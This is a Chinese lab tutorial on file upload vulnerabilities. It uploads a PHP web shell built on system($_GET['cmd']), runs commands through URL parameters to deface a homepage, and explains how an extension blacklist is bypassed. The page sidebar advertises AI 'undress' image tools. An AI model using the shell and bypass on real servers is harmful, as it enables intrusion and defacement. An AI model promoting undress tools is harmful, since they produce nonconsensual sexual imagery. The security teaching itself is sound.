文件上传漏洞实例分析
原理
文件上传是Web应用中经常出现的功能,它允许用户上传文件到服务器并保存到特定位置。这对安全来说是一个很敏感的问题,一旦恶意程序被上传到服务器并获得执行权限,后果将不堪设想。因此绝大多数的Web应用都对文件上传功能有很多限制。文件上传漏洞指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这种攻击方式直接、有效,在对付某些脆弱的系统时甚至没有门槛。
文件上传漏洞的常见利用方式有:
上传Web脚本程序,Web容器解释执行上传的恶意脚本。
上传Flash跨域策略文件crossdomain.xml,修改访问权限(其他策略文件利用方式类似)。
上传病毒、木马文件,诱骗用户和管理员下载执行。
上传包含脚本的图片,某些浏览器的低级版本会执行该脚本,用于钓鱼和欺诈。
总的来说,利用的上传文件要么具备可执行能力(恶意程序),要么具备影响服务器行为的能力(配置文件). 为了实现一次攻击利用,必须要满足以下条件:
文件能通过前端和后端的过滤和文件处理.
文件内容不会被改变,能够被正确的存储
存储位置是在Web容器控制范围
攻击者有权限访问存储目录
我们通过实验来演示利用方式一,包含以下材料:
regist文件夹(存在漏洞的eb应用)
hacker.php(待上传的恶意脚本)
hacked.html (黑页待替换的新主页)
使用以下命令下载实验材料到虚拟机任意目录下并解压.
wget http://labfile.oss.aliyuncs.com/courses/443/stuffs.tar.gztar -xzf stuffs.tar.gzcd stuffs
1.部署web应用
将regist文件夹拷贝到/var/www/html/目录下
sudo cp -R regist /var/www/html/
regist文件夹的目录结构如下
index.html (前端注册页面)
regist.php (后台注册处理程序)
upload/ (文件上传目录)
css/ (样式文件目录)
fonts/ (字体文件目录)
js/ (脚本文件目录)
修改目录权限:
sudo chmod 777 /var/www/html/regist -R启动Apache2服务
sudo service apache2 start
2.上传恶意脚本程序
这是一个常见的新用户注册页面,我们随意填写注册信息.我们注意到,虽然这个页面对用户输入的文本信息有较为仔细的校验,但是并没有对上传头像的类型进行严格的检查,这是非常危险的行为.在上传头像处选择事先准备好的恶意PHP程序hacker.php.确认无误,点击注册.(用同样的方法上传hacked.html)
3.访问脚本程序
通过目录结构知道上传后的文件被存储在upload/目录下.上传的PHP文件可以通过在浏览器地址栏中输入http://localhost/regist/upload/hacker.php来访问
hacker.php源代码如下:
cmd:
result:
事实上,你可以在脚本文件中编写任意你喜欢的代码,只要构造得当并能够被顺利执行.
核心代码system($_GET['cmd']);调用php系统函数system来执行linux系统命令,命令从GET请求中的cmd参数获取.这意味着我们可以在当前用户权限下执行任意的linux命令,就像操作本地计算机一样.先测试一下恶意程序能否正常运行:
http://localhost/regist/upload/hacker.php?cmd=whoami
运行成功,这也意味着后端负责上传功能的程序模块没有对上传文件做有效的过滤和处理.接着,我们使用上传的hacke.html页面来替换网站首页:
http://localhost/regist/upload/hacker.php?cmd=mv hacked.html ../index.html
再次访问Web应用localhost/regist,刷新页面,发现替换成功,页面显示"You Are Hacked".
注意,这里需要将hacked.html上传至 /upload目录下
思考与扩展
1.类型检查
实验步骤中的网站前端部分没有对文件上传做有效的过滤与处理,同类的著名漏洞还有FCKEditor文件上传漏洞,FCKEditor是一款非常流行的富文本编辑器,某个PHP版本出过一个文件上传类型检查的漏洞,相关代码如下:
$Config['AllowdExtensions']['File'] = array();//允许上传的类型$Config['DenedExtensions']['File'] =array('php', 'php3', 'php5', 'phtml', 'asp', 'aspx', 'ascx', 'jsp', 'cfm', 'cfc', 'pl','pl','bat', 'exe', 'dll', 'reg', 'cgi' );//禁止上传的类型
可以看到,代码针对文件类型进行了检查,但使用了黑名单方式,所以如果我们使用php2、inc等类型名时就可以通过类型检查.另外,对于前端校验,在通常情况下可以通过修改或伪造POST包来绕过。
2.权限需求为了达到攻击效果,实验步骤简化了一些复杂的细节.一些关键步骤都涉及到了操作权限.步骤对应所需的权限如下表:
步骤或操作 权限要求
[1] [2] 下一页

熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱門文章

熱工具

記事本++7.3.1
好用且免費的程式碼編輯器

SublimeText3漢化版
中文版,非常好用

禪工作室 13.0.1
強大的PHP整合開發環境

Dreamweaver CS6
視覺化網頁開發工具

SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)

在PHP中,應使用password_hash和password_verify函數實現安全的密碼哈希處理,不應使用MD5或SHA1。1)password_hash生成包含鹽值的哈希,增強安全性。 2)password_verify驗證密碼,通過比較哈希值確保安全。 3)MD5和SHA1易受攻擊且缺乏鹽值,不適合現代密碼安全。

PHP和Python各有優勢,選擇依據項目需求。 1.PHP適合web開發,尤其快速開發和維護網站。 2.Python適用於數據科學、機器學習和人工智能,語法簡潔,適合初學者。

PHP在電子商務、內容管理系統和API開發中廣泛應用。 1)電子商務:用於購物車功能和支付處理。 2)內容管理系統:用於動態內容生成和用戶管理。 3)API開發:用於RESTfulAPI開發和API安全性。通過性能優化和最佳實踐,PHP應用的效率和可維護性得以提升。

PHP是一種廣泛應用於服務器端的腳本語言,特別適合web開發。 1.PHP可以嵌入HTML,處理HTTP請求和響應,支持多種數據庫。 2.PHP用於生成動態網頁內容,處理表單數據,訪問數據庫等,具有強大的社區支持和開源資源。 3.PHP是解釋型語言,執行過程包括詞法分析、語法分析、編譯和執行。 4.PHP可以與MySQL結合用於用戶註冊系統等高級應用。 5.調試PHP時,可使用error_reporting()和var_dump()等函數。 6.優化PHP代碼可通過緩存機制、優化數據庫查詢和使用內置函數。 7

PHP類型提示提升代碼質量和可讀性。 1)標量類型提示:自PHP7.0起,允許在函數參數中指定基本數據類型,如int、float等。 2)返回類型提示:確保函數返回值類型的一致性。 3)聯合類型提示:自PHP8.0起,允許在函數參數或返回值中指定多個類型。 4)可空類型提示:允許包含null值,處理可能返回空值的函數。

PHP仍然具有活力,其在現代編程領域中依然佔據重要地位。 1)PHP的簡單易學和強大社區支持使其在Web開發中廣泛應用;2)其靈活性和穩定性使其在處理Web表單、數據庫操作和文件處理等方面表現出色;3)PHP不斷進化和優化,適用於初學者和經驗豐富的開發者。

PHP適合web開發,特別是在快速開發和處理動態內容方面表現出色,但不擅長數據科學和企業級應用。與Python相比,PHP在web開發中更具優勢,但在數據科學領域不如Python;與Java相比,PHP在企業級應用中表現較差,但在web開發中更靈活;與JavaScript相比,PHP在後端開發中更簡潔,但在前端開發中不如JavaScript。

PHP和Python各有優劣,選擇取決於項目需求和個人偏好。 1.PHP適合快速開發和維護大型Web應用。 2.Python在數據科學和機器學習領域佔據主導地位。
